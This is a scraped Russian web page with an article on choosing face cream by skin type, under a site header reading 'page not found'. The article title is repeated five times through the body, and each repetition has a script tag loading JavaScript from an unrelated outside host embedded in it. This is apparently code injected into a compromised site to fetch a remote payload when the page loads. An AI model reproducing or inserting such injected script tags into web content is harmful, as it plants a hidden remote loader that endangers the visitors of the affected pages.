Запрашиваемая страница не найдена USD     CNY     EUR     JPY
Москва C
Последние новости
24 июн 2018, 17:33
По итогам мая российские автолюбители купили 149 машин премиальной марки...
Поиск

Какую марку автомобиля вы предпочитаете?

» » Правильный крем для кожи, чтобы выглядеть роскошно

Правильный крем для кожи, чтобы выглядеть роскошно

24 июл 2013, 10:43    ismirnov
0 комментариев    11 054 просмотра

Правильный крем <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для кожи, чтобы выглядеть роскошно

С наступлением лета подавляющее количество женщин обеспокоены объёмом своей фигуры и состоянием своей кожи. Средств ухода за кожей очень много, среди которых можно назвать такие, как маски, ванночки, электроэпиляция и крема. Но, как правильно подбирать крем для своей кожи знают не все женщины, но выглядеть роскошно они просто обязаны. Тем более, эта тема касается не только "всех подряд женщин", но и состоятельных бизнес леди, и гламурных светстких львиц, и тусовщиц богемы. Небольшой урок об уходе за кожей будет актуален.

 

Одним из главных средств по уходу за лицом является крем, и только при правильном выборе данного средства ваша кожа будет выглядеть на пять с плюсом.  Все составы кремов разные, они изготовлены под определенный тип кожи, и при покупке крема важно знать свой тип. Эта статья поможет вам правильно определить свой тип кожи и подскажет, как за ним ухаживать.

 

В течение всей нашей жизни тип кожи не меняется, собственно он и отвечает за все возникающие проблемы с ней. Чаще всего на кожу влияет гормональный фон, и очень важно в подростковый  период тщательнее ухаживать за ней. Именно в это время появляется повышенная жирность и угревая сыпь, а после  подросткового этапа, кожа снова проявляет свой тип.

 

Косметология различает множество типов кожи, но основными являются такие типы как: нормальная, комбинированная, жирная, сухая, зрелая и чувствительная. Давайте рассмотрим каждый тип кожи по отдельности.

 Правильный крем <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для кожи, чтобы выглядеть роскошно

Нормальная кожа:

Обладательницы нормальной кожи лица – просто счастливицы, ведь она является самой беспроблемной. Кожа имеет эластичность, отсутствует жирный блеск и неприятные на вид поры. Но и за таким типом кожи тоже стоит заботиться. Самое главное – это, ежедневное питание и увлажнение, а используемые крема должны подходить для данного типа.

 

Жирная или комбинированная кожа:Правильный крем <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для кожи, чтобы выглядеть роскошно

Это, наверное, самый распространенный тип кожи. Показателями этого типа являются чрезмерный блеск, расширенные поры, угревая сыпь. Косметологи не разделяют комбинированную и жирную кожу, так как у них не много различий. Комбинированная кожа имеет жирность в основном на лбу, носу и подбородке. А это наибольшая часть лица, поэтому, чаще всего, за данными типами кожи подбираются одинаковые косметологические средства.

 

Жирный тип кожи имеет повышенную сальность и блеск, зато она дольше остается молодой и медленнее стареет. И с возрастом этот тип изменяется, становясь комбинированной.

 

Жирной коже, так же как и другим типам, нужно увлажнение, так как, пересушив ее, мы заставляем сальные железа вырабатывать еще больше жира. В составе крема для данного типа обязательно должны присутствовать противовоспалительные элементы такие как, подорожник, шалфей и ромашка. Именно они хорошо снимают воспаление, также можно использовать салициловую кислоту. Чтобы пору не закупоривались, нужно пользоваться косметическими средствами, которые содержат натуральные масла, и избегать добавления минеральных масел. Обратите внимание, что средства содержащие спирт, идеально подходят только для юной жирной кожи.

 Правильный крем <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для кожи, чтобы выглядеть роскошно

Сухая кожа:

Особенности сухой кожи – это, отсутствие жирного блеска и тонкость. Поры, на сухой коже мелкие и практически не заметные. Угревая сыпь возникает в редких случаях. Часто такая кожа встречается у светлокожих девушек. Но отсутствие вышеперечисленных проблем не делает такую кожу идеальной. Она очень капризна и требует особого ухода. Стоит только использовать крем с неправильно подобранным составом, как она начинает шелушиться, тускнеет и доставляет хозяйке дискомфорт. Данный тип кожи раньше стареет, теряет свою упругость и покрывается морщинками. Обладательницы сухой кожи раньше всех начинают пользоваться антивозрастными средствами.

 

При уходе за данным типом кожи, стоит обратить внимание на густые крема и сыворотки с более мощным действием. В составах косметических средств обязательно должны присутствовать гиалуроновая кислота, коллаген, ретинол, витамин D, эластин и растительные экстракты. Также рекомендуется применять крема с добавлением пчелиного молочка, воска и меда.

 

Чувствительная кожа:Правильный крем <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для кожи, чтобы выглядеть роскошно

Чувствительная кожа чем-то похожа с сухим типом кожи. Она также имеет тонкий кожный покров и маленькое количество подкожного сала. Можно подумать, что она идеальна, но это только на первый взгляд. Иногда с данным типом кожи случаются резкие изменения, похожие на аллергические реакции. Появляется раздражение, шелушение, покраснение и сухость. Причиной тому может быть все что угодно: питание, посещение косметолога, проба нового средства или просто перемена погоды.

 

Имея чувствительную кожу нужно обратить внимание на свое питание. Стоит исключить некоторые виды аллергенов, а в косметических средствах должны полностью отсутствовать отдушки. Если вы пользуетесь различными сыворотками и препаратами в ампулах, проверьте их содержимое на наличие активных ингредиентов. Все крема для чувствительной кожи не должны содержать фруктовую или салициловую кислоту. Ретинол также противопоказан. Нужно пользоваться средствами, которые содержат масла ши, каритон и силикон. Вы убережете свою кожу от покраснений, если приобретете крем, в состав которого входит солнцезащитный фильтр.

 

До приобретения какого-либо средства, стоит опробовать его на сгибе локтя или на запястье. Если не возникло никакой реакции за пять минут, то косметическое средство  спокойно можно использовать. Сегодня множество средств для ухода за кожей лица выпускаются во флаконах с дозатором. Крема и спреи не имеют контакта с окружающей средой, а значит попадание бактерий, на вашу кожу, при применении средства исключены. Как говорилось выше, чувствительная кожа очень нежна и требовательна, и для того чтобы избежать ненужных воспалений, старайтесь как можно реже прикасаться к ней руками.

 Правильный крем <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для кожи, чтобы выглядеть роскошно

Зрелая кожа:

Зрелой коже нужен отдельный и внимательный уход. Каждый из нас понимает, что процесс старения кожи неизбежен, но все, же его можно замедлить, если должным образом за ним ухаживать. Внутренние ресурсы организма в зрелом возрасте ограничены, поэтому в данном случае стоит обеспечить коже дополнительное питание.

 

Продлевать молодость зрелой коже можно увлажнением, а значит, в составе крема обязательно должна присутствовать гиалуроновая кислота. Также стоит обратить внимание на такие составы, в которых имеется ретинол. Это витамин А, который поможет нейтрализовать свободных радикалов, именно они нарушают выработку коллагена. Кинетин – смягчает кожу, а коэнзим Q10 – помогает сглаживать морщины. Еще стоит не забывать про витамины С и Е, и экстракты зеленого и черного чая.

 

Обладательницы любого типа кожи, следите и ухаживайте за ней с самого начала, и она отплатит вам красотой и свежестью до самого зрелого возраста! 

Комментарии
  • bowtiesmilelaughingblushsmileyrelaxedsmirk
    heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
    winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
    worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
    expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
    disappointedconfoundedfearfulcold_sweatperseverecrysob
    joyastonishedscreamtired_faceangryragetriumph
    sleepyyummasksunglassesdizzy_faceimpsmiling_imp
    neutral_faceno_mouthinnocent